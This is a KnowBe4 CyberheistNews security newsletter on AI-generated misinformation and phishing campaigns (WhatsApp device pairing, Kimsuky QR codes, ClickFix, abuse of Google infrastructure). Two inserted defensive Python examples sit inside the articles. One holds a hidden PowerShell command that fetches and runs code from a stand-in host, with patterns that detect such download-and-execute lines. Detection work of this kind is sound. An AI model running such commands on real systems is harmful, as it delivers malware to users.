CyberheistNews Vol 16 #02 When You Can't Believe Your Eyes: AI and the New Misinformation Playbook

KnowBe4 Team | Jan 13, 2026

When You Can't Believe Your Eyes: AI and the New Misinformation Playbook

In the early hours following reports of a U.S. military operation involving Venezuela, social media feeds were flooded with dramatic images and videos that appeared to show the capture of Venezuelan president Nicolás Maduro.

Within minutes, AI-generated photos of Maduro being escorted by U.S. law enforcement, scenes of missiles striking Caracas and crowds celebrating in the streets racked up millions of views across various social media channels.

The problem? Much of this content was fabricated or misleading.

Fake images circulated alongside real footage of aircraft and explosions, creating a convincing—but deeply confusing—mix of truth and fiction. The lack of verified, real-time information created a vacuum, and advanced AI tools rushed in to fill it.

According to fact-checking organizations, several widely shared images were generated or altered using AI, despite appearing realistic enough to fool casual viewers—and even public officials.

This is exactly how modern social engineering works.

Attackers don't rely on obviously fake signals anymore. Just as phishing emails now mimic trusted brands and real conversations, AI-generated images increasingly "approximate reality." They don't need to be wildly inaccurate to be effective, just believable enough to bypass skepticism and trigger an emotional response.

Even experienced users struggled to determine what was real. Reverse image searches, AI-detection tools and watermarking technologies like Google's SynthID can help identify manipulated content, but they're far from foolproof. When fake visuals closely resemble real events, detection becomes inconsistent and misinformation spreads faster than fact-checkers can respond.

That uncertainty is the point.

In cybersecurity, we warn employees that urgency, authority and incomplete data are classic manipulation tactics. The same techniques were on full display here. Breaking news, high emotional stakes and a flood of convincing visuals pushed people to share first and verify later—if at all.

The takeaway for organizations and individuals is clear: visual content can no longer be trusted at face value, especially during fast-moving events. Training people to pause, question sources and look for verification is just as important for news consumption as it is for email security.

Because whether it's a phishing email or an AI-generated image, the goal is the same: get you to believe something before you have time to think. And in today's threat landscape, believing is often the first step toward being misled.

Blog post with links:
https://blog.knowbe4.com/when-seeing-isnt-believing-ai-images-breaking-news-and-the-new-misinformation-playbook

Deepfake: Empowering Your Users to Recognize What AI Can Fake

Your users are being targeted right now. Deepfake attacks happen every few minutes, and nearly half of all organizations have already been hit. When a deepfake lands in your user's inbox, will they spot it or fall for it?

In this session, Perry Carpenter, Chief Human Risk Management Strategist, and Chris Littlefield, Product Manager, pull back the curtain on the next era of social engineering. Deepfakes, AI agents and synthetic narratives are reshaping the threat landscape and traditional training no longer prepares users for attacks that feel real.

You'll learn how to build a workforce that stays calm, curious and grounded in truth, even when a scam sounds exactly like someone they trust.

You'll explore:

  • How attackers use plausibility, framing and misdirection to make AI-generated impersonations feel instantly legitimate
  • Recent deepfake and voice-clone incidents that expose where human judgment faltered—and how better cognitive defenses would have changed the outcome
  • Training methods that build narrative awareness and emotional self-regulation, preventing both overreaction and paralysis
  • Practical verifications your employees can practice to recognize a fake even when an email sounds right, a voice sounds familiar or a video "looks close enough"
  • NEW! KnowBe4's Deepfake Training Content shows how to create a custom deepfake training experience featuring your own leaders to transform abstract risk into unforgettable learning moments

You'll leave the webinar with the strategy and tools to help employees recognize and validate AI-driven manipulation, plus measurable ways to demonstrate to leadership how you can reduce real-world deepfake risks.

Date/Time: TOMORROW, Wednesday, January 14 @ 2:00 PM (ET)

Can't attend live? No worries — register now and you will receive a link to view the presentation on-demand afterwards.

Save My Spot:
https://info.knowbe4.com/new-deepfake-training-na?partnerref=CHN2

Phishing Campaign Targets WhatsApp Accounts

Researchers at Gen warn that a phishing campaign is attempting to trick users into linking malicious devices to their WhatsApp accounts.

The attack begins with an unsolicited message stating, "Hey, I just found your photo!" along with a link to a spoofed Facebook login page. Instead of trying to steal users' Facebook credentials, however, the attackers are attempting to gain access to victims' WhatsApp accounts.

"This page has two purposes," the researchers explain. "First, it creates a sense of familiarity that encourages the user to trust the page. People expect Facebook to ask for some kind of confirmation from time to time. Seeing a login button or a verification step feels normal.

"Second, it acts as the attacker's control panel. The page is not connecting with Facebook but rather mediating between the victim and the legitimate WhatsApp Web infrastructure that the attacker is abusing."

The phishing page either shows a QR code or contains a field for the user to enter their phone number. The attack proceeds as follows:

  • The victim types their phone number on the fake page.
  • The page forwards that number to WhatsApp's legitimate "link device via phone number" feature.
  • WhatsApp generates a pairing code that is meant to be seen only by the account owner.
  • The attacker's site takes that code and displays it back to the victim with text that suggests they should 'enter this in WhatsApp to confirm the login and see the photo.'
  • The victim opens WhatsApp, sees the pairing prompt and enters the code, believing they are completing a security check.

Once the malicious device is paired, the attacker has full access to the victim's WhatsApp account and can send additional phishing messages to the victim's contacts.

Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.

Blog post with links:
https://blog.knowbe4.com/phishing-campaign-targets-whatsapp-accounts

Automate Incident Response and Maximize SOC Efficiency

Your security team is drowning in alerts, and threats are slipping through. With SOC teams facing more than 4,400 daily alerts, over 40% of which are false positives, the vast majority of organizations are drowning in backlogs.

The result? A five-hour response gap that leaves threats sitting in your employee inboxes for days or weeks. Stop gambling with unaddressed alerts with technology that collapses the time-to-containment from hours to minutes.

During this demo, you'll discover how PhishER Plus eliminates the dangerous vulnerability window between threat detection and containment by combining triple-validated threat intelligence with human oversight:

  • Accelerate response times with AI-powered automation that lets you code custom rules in plain English, reduces manual email review time by up to 99% and eliminates alert fatigue
  • Leverage unmatched threat intelligence from 13+ million global users, KnowBe4 Threat Research Lab, and leading third-party integrations, catching zero-day threats that bypass SEGs and other ICES defenses
  • Maintain complete visibility and control over AI-driven decisions with PhishML Insights, eliminating black-box uncertainty and reducing false positives that waste $875K annually
  • Remove threats automatically from all mailboxes with Global PhishRIP before users can interact with them, eliminating the risk of employees otherwise falling for the attack
  • Convert real attacks into targeted training opportunities with PhishFlip, reinforcing vigilant employee behavior while showcasing security awareness gaps

Discover how PhishER Plus customers achieve 650% ROI within the first year. Transform your employees into your most valuable defenders while meeting SOC efficiency targets.

Date/Time: Wednesday, January 21 @ 2:00 PM (ET)

Save My Spot:
https://info.knowbe4.com/phisher-demo-1?partnerref=CHN

North Korean Threat Actor Spreads Malware via QR Codes

The North Korean threat actor "Kimsuky" is using QR codes to trick users into installing malicious mobile apps, according to security researchers at ENKI.

The phishing sites, which impersonate delivery services, inform users that the webpage cannot be viewed on a desktop. The sites instruct the user to scan a QR code in order to open the page on their phone. This helps the attack bypass security defenses that might be present on the user's work computer.

"We confirmed that the malicious application was distributed from the IP address 27.102.137[.]181, leveraging a QR code that impersonated a legitimate package delivery service," the researchers explain.

"Among the four malicious applications discovered during the investigation, two masqueraded as delivery service apps. A previous report by ESTSecurity documented similar cases where the threat actor transmitted URLs hosting malicious apps via smishing texts that impersonated delivery companies. Consequently, we assess with high confidence that the threat actor employed smishing or phishing emails for initial access, consistent with historical TTPs."

When the user scans the QR code, they'll be taken to a phishing page that uses social engineering to trick them into installing malware or entering sensitive information.

"While clicking the link does not automatically execute the malicious app, the threat actor designs sophisticated phishing sites to trick victims into running the malware or entering personal information," ENKI says.

"To prevent infection, users should avoid clicking links from unknown senders. For links received from known contacts, if the content appears unusual or suspicious, users should verify the message with the sender before clicking."

AI-powered security awareness training gives your organization an essential layer of defense against social engineering attacks.

Blog post with links:
https://blog.knowbe4.com/north-korean-threat-actor-spreads-malware-via-qr-codes

[Live Demo] Stop Inbound and Outbound Email Threats

With over 376 billion emails sent daily, your organization faces unprecedented risks from Business Email Compromise (BEC), misdirected sensitive communications and sophisticated AI-driven phishing attacks. The human element, involved in the vast majority of data breaches, contributes to email-based threats that cost organizations like yours millions annually.

Discover how you can stop up to 97% more attacks and uncover 10x more potential data breaches in your Microsoft 365 environment before they happen.

Join our live demo to see how KnowBe4's Cloud Email Security seamlessly integrates into Microsoft 365 to enhance its native protection while providing the tools needed to identify risky communications before they lead to breaches.

See KnowBe4's Cloud Email Security in action as we show you how to:

  • Defend your organization against sophisticated inbound threats including BEC, supply chain attacks and ransomware
  • Prevent costly outbound mistakes with real-time alerts that stop misdirected emails and unauthorized file sharing
  • Enforce information barriers that keep you compliant with industry regulations
  • Detect and block data exfiltration attempts before sensitive information leaves your organization
  • Customize incident response workflows to match your security team's needs

Strengthen your security posture with AI-native intelligent email security that reduces human-activated risk and safeguards your organization from inbound and outbound threats.

Date/Time: Wednesday, January 21 @ 1:00 PM (ET)

Save My Spot:
https://info.knowbe4.com/ces-demo-month-1?partnerref=CHN


Let's stay safe out there.

Warm regards,

Stu Sjouwerman, SACP
Executive Chairman
KnowBe4, Inc.

PS: HR professionals don’t expect bad actors to "apply" for a position. This makes them susceptible to real security threats. Here is free training for your HR Team:
https://www.knowbe4.com/free-cybersecurity-tools/secure-hiring-and-onboarding

PPS: Your KnowBe4 Fresh Content Updates from December 2025:
https://blog.knowbe4.com/fresh-content-updates-from-december-2025

Quotes of the Week  

"Very little is needed to make a happy life; it is all within yourself, in your way of thinking."
- Marcus Aurelius - Roman Emperor (121 - 180 AD)


"One’s mind, once stretched by a new idea, never regains its original dimensions."
- Oliver Wendell Holmes - Physician, Poet, and Polymath (1809 - 1894)


Thanks for reading CyberheistNews

You can read CyberheistNews online at our Blog
https://blog.knowbe4.com/cyberheistnews-vol-16-02-when-you-cant-believe-your-eyes-ai-and-the-new-misinformation-playbook

Security News

ConsentFix Attacks Fake Cloudflare Prompts

By Roger Grimes

ClickFix attacks have been around for decades; only the name is new. ClickFix attacks use social engineering to trick users into clicking on buttons and links that the user is told are needed so their browser or computer can perform some desired action.

ClickFix Attacks

The most common original form of ClickFix attack, and the one the name comes from, begins when a user searches for some computer error they are seeing, say Windows error 1F0039a (I made that up), and the search engine returns a long list of links about that error.

Unbeknownst to the user, the search engine results have been gamed (i.e., "poisoned") so that a simple search for a solution returns a malicious website high in the results. Usually the attacker has either built a fake website with the error message embedded over and over (but not visible to users), or paid the search engine vendor to have their website returned whenever that particular keyword is searched. Either way, the attacker's link ends up high on the list of websites offering solutions.

When the user goes to the malicious website, the scammer attempts to social engineer the user into performing an action that is against the user's best interests. In most cases, it is to click a button to fix something (hence, the "ClickFix" name).

Sometimes the button click takes the user to another malicious website, sometimes it downloads a malicious document or content, and sometimes it brings up instructions that the user is supposed to copy and run on their computer.

These days, when you hear of a ClickFix attack, it is usually the variant in which the victim is tricked into copying and pasting attack code into their own desktop environment, unwittingly executing malware on their computer. Because the user runs the code themselves, it bypasses firewalls, antivirus scanners and content filters.
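Because the paste-and-run variant described above is executed by the user, the place to catch it is endpoint telemetry rather than the network edge. The following is an added example, not code from KnowBe4 or from Roger Grimes's column: a small Python triage routine that scores constructed process-creation events (the `ProcessEvent` records, the interpreter list, the choice of explorer.exe as the "launched by the user" parent and the argument heuristics are all assumptions of this example) and flags an interpreter launched from the user's shell with command-line traits typical of a pasted one-liner. The events are invented sample data, not real telemetry.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal view of a process-creation record (assumed schema for this example)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample events. The first two mimic the paste-and-run pattern the
# column describes; the last two are ordinary activity that must not be flagged.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/p)"'),
    ProcessEvent("explorer.exe", "mshta.exe", "mshta https://example.invalid/v.hta"),
    ProcessEvent("code.exe", "powershell.exe", "powershell -NoProfile -File build.ps1"),
    ProcessEvent("explorer.exe", "notepad.exe", "notepad C:\\Users\\me\\notes.txt"),
]

# Interpreters a pasted one-liner typically runs through (assumed heuristic list).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
# Parents that indicate the user typed or pasted the command themselves
# (Run dialog, Start menu, File Explorer address bar); assumption of this example.
USER_SHELLS = {"explorer.exe"}

# Command-line traits that are rare in a user's own day-to-day commands.
SUSPICIOUS_ARGS = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "invoke-expression"),
    (re.compile(r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|curl|wget)\b", re.I),
     "download in command line"),
    (re.compile(r"https?://", re.I), "URL in command line"),
    (re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), "execution policy bypass"),
]


def score_event(ev):
    """Return (score, reasons); only interpreter launches can score at all."""
    reasons = []
    if ev.image.lower() not in INTERPRETERS:
        return 0, reasons
    if ev.parent_image.lower() in USER_SHELLS:
        reasons.append("interpreter launched from the user's shell")
    for pattern, label in SUSPICIOUS_ARGS:
        if pattern.search(ev.command_line):
            reasons.append(label)
    return len(reasons), reasons


def find_suspicious(events, threshold=2):
    """Events whose score reaches the threshold, with the reasons that fired."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, reasons))
    return hits


if __name__ == "__main__":
    for ev, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"REVIEW {ev.image} <- {ev.parent_image}: {', '.join(reasons)}")
```

The threshold of two signals keeps a developer running a build script out of the queue while still catching the hidden-window download-and-execute shape; tune the parent list and patterns to what your own fleet actually produces before relying on it.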

[CONTINUED] at the KnowBe4 Blog:
https://blog.knowbe4.com/consentfix-attacks-fake-cloudflare-prompts

Phishing Campaign Abuses Google’s Infrastructure to Bypass Defenses

Researchers at RavenMail warn that a major phishing campaign targeted more than 3,000 organizations last month, primarily in the manufacturing industry. The phishing messages posed as legitimate business notifications, such as file access requests or voicemail alerts, and were designed to send users to credential-harvesting login pages.

Notably, the campaign abused legitimate Google infrastructure and links to avoid being flagged by security tools.

"In each case, emails were sent from legitimate Google infrastructure, passed SPF, DKIM and DMARC, and used trusted Google-hosted URLs as payloads," RavenMail says. "This fundamentally breaks the trust model that most email security platforms rely on.

"Security researchers have repeatedly observed that these campaigns bypass both secure email gateways and native email protections because there is nothing technically 'wrong' with the message delivery itself."

The campaign didn't involve any breach of Google's systems, but the attackers were able to "manipulate workflow automation services meant to streamline business processes." The researchers note that this is part of a broader trend in which attackers are abusing legitimate services to bypass defenses.

"Attackers are also hosting phishing pages and multi-stage redirectors on Google Cloud Storage (GCS) - a fully trusted, HTTPS-served domain space," RavenMail says. "Because many URL reputation systems treat cloud provider domains as benign, these links frequently evade detection.

"Separately, other campaigns have exploited Google platforms like Google Classroom and Google Forms to distribute phishing content at massive scale and avoid security filters that block unknown or low-reputation domains."
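The RavenMail finding above is that SPF, DKIM and DMARC answer "did this really come from the claimed domain?" and nothing more; a message can pass all three and still carry a phishing link on a shared cloud host. The following is an added example, not code from RavenMail or KnowBe4: a Python triage function that reads the Authentication-Results header, then separately checks whether links point at hosts that anyone can publish to. The sample messages, the `example.com` recipient and the `SHARED_CLOUD_HOSTS` set are constructed assumptions of this example (the hosts are the public ones for the Google services the article names).

```python
import re
from email import message_from_string
from urllib.parse import urlparse

# Public hosts for the Google services the article names (GCS, Google Forms,
# Google Classroom). Assumed list for this example; extend for your own environment.
SHARED_CLOUD_HOSTS = {"storage.googleapis.com", "docs.google.com", "classroom.google.com"}
URL_RE = re.compile(r"https?://[^\s<>\"')]+")

# Constructed sample 1: passes every authentication check because it was sent
# through the provider's own infrastructure, yet the "payload" is a bucket-hosted page.
SAMPLE_GCS = """\
From: "Shared Drive" <drive-shares-noreply@google.com>
To: finance@example.com
Subject: File access request: Q4_invoice.pdf
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=google.com; dkim=pass header.d=google.com; dmarc=pass header.from=google.com

A user has requested access to Q4_invoice.pdf.
Review the request: https://storage.googleapis.com/example-bucket/review.html
"""

# Constructed sample 2: authenticated, link on a host the organization controls.
SAMPLE_INTERNAL = """\
From: it-notices@example.com
To: finance@example.com
Subject: Updated travel policy
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com; dkim=pass header.d=example.com; dmarc=pass header.from=example.com

The travel policy has been updated: https://intranet.example.com/policy
"""

# Constructed sample 3: display-name spoof from unrelated infrastructure; DMARC fails.
SAMPLE_SPOOFED = """\
From: "Google Drive" <notify@bulk.example.net>
To: finance@example.com
Subject: File shared with you
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=bulk.example.net; dkim=none; dmarc=fail header.from=google.com

Open: https://storage.googleapis.com/another-bucket/open.html
"""


def parse_auth_results(header):
    """Pull the spf/dkim/dmarc verdicts out of an Authentication-Results header."""
    return {m.group(1).lower(): m.group(2).lower()
            for m in re.finditer(r"\b(spf|dkim|dmarc)=(\w+)", header, re.I)}


def triage(raw_message):
    """Route a message: quarantine on failed auth, review on shared-cloud links, else deliver."""
    msg = message_from_string(raw_message)
    auth = parse_auth_results(msg.get("Authentication-Results", ""))
    auth_pass = all(auth.get(k) == "pass" for k in ("spf", "dkim", "dmarc"))
    body = msg.get_payload()  # the samples are single-part text
    hosts = [urlparse(u).hostname or "" for u in URL_RE.findall(body)]
    cloud_hosted = sorted({h for h in hosts if h in SHARED_CLOUD_HOSTS})
    if not auth_pass:
        verdict = "quarantine"   # sender could not be authenticated
    elif cloud_hosted:
        verdict = "review"       # authentic sender, but content on a host anyone can use
    else:
        verdict = "deliver"
    return {"auth": auth, "auth_pass": auth_pass,
            "cloud_hosted_links": cloud_hosted, "verdict": verdict}


if __name__ == "__main__":
    for name, raw in [("gcs", SAMPLE_GCS), ("internal", SAMPLE_INTERNAL), ("spoofed", SAMPLE_SPOOFED)]:
        print(name, triage(raw))
```

The cloud-host branch deliberately routes to human review rather than blocking, because the same hosts carry a great deal of legitimate sharing; the value of the check is that it stops authentication alone from being treated as a clean bill of health.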

AI-powered security awareness training gives your organization an essential layer of defense against evolving social engineering attacks.

RavenMail has the story:
https://ravenmail.io/blog/phishing-using-google-infra

What KnowBe4 Customers Say

"Thank you for reaching out! I hope you had a good holiday and I’m glad to have this opportunity to give a shout out to our CSM, Kim A. She has genuinely provided the best customer support I’ve ever experienced, in a corporate or private setting. We had a few unusual requirements and experienced some unexpected issues with our own internal systems, and she’s been incredibly responsive and helpful throughout. I can’t say enough good things about how well our onboarding journey has gone so far. Thanks again!"

- A.D., Global Manager, Security Awareness


"I just wanted to drop you a quick note and let you know how AWESOME Tom is. He is showing us things in the platform we never knew existed. He is helping us tweak our campaigns, teaching us to use some of the newer features and just been an all-around pleasure to work with.

"We look forward to our monthly calls and are constantly thinking of ways (or Tom is helping shape some of those thought processes) to improve the platform and overall security awareness here.

"We are a super small team with a giant workload. Having a CSM that can point us in the proper direction and help get things configured, has been an awesome change for our team. While we would love to spend time and become experts in all our platforms, it is not feasible. Having a trusted resource like Tom, looking at our account settings, making recommendations, and showing us how to configure those recommendations, has been a game changer for us.

"Please give that dude a raise!!!!!!!

"Side Note: We may cry if we ever lose him from our account now! That is how much we love Tom. You should be proud to have someone as thorough, caring, and easy to work with, on your team. I know I would be!

"Thanks for your time and for letting Tom change our perception of KB4. It has been an awesome ride these last couple months! Best wishes on a fantastic rest of your day!"

- B.J., AVP of Infrastructure and IT Security

The 10 Interesting News Items This Week
  1. BREAKING NEWS: 'Instagram 17.5M security breach'. Data is already being offered on the dark web. Malwarebytes provides a free scan to see if an email is compromised:
    https://www.malwarebytes.com/digital-footprint?

  2. Maduro raid had telltale signs of a cyber-enabled blackout:
    https://www.axios.com/2026/01/08/venezuela-maduro-raid-blackout-cyber-operation

  3. What CISOs need from AI in a new year of cyberthreats:
    https://www.informationweek.com/cybersecurity/what-cisos-need-from-ai-in-a-new-year-of-cyberthreats

  4. A Fifth of Data Breaches Take Two Weeks(!) to Recover From:
    https://www.infosecurity-magazine.com/news/fifth-breaches-two-weeks-recover/

  5. Fake ChatGPT and DeepSeek Extensions Spied on Over 1 Million Chrome Users:
    https://hackread.com/fake-chatgpt-deepseek-extensions-spy-chrome-users/

  6. World Economic Forum: Deepfake Face-Swapping Tools Are Creating Critical Security Risks:
    https://www.infosecurity-magazine.com/news/wef-deepfake-faceswapping-security/

  7. Europol Leads Global Crackdown on Black Axe Cybercrime Gang, 34 Arrested:
    https://www.infosecurity-magazine.com/news/europol-crackdown-on-black-axe/

  8. FBI warns of phishing messages impersonating senior U.S. officials:
    https://www.ic3.gov/PSA/2025/PSA251219

  9. Phishing campaign uses HTML tables to render malicious QR codes:
    https://isc.sans.edu/diary/A+phishing+campaign+with+QR+codes+rendered+using+an+HTML+table/32606

  10. Attackers are increasingly using OAuth consent phishing to gain access to cloud environments:
    https://www.netskope.com/resources/cloud-and-threat-reports/cloud-and-threat-report-2026

Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff
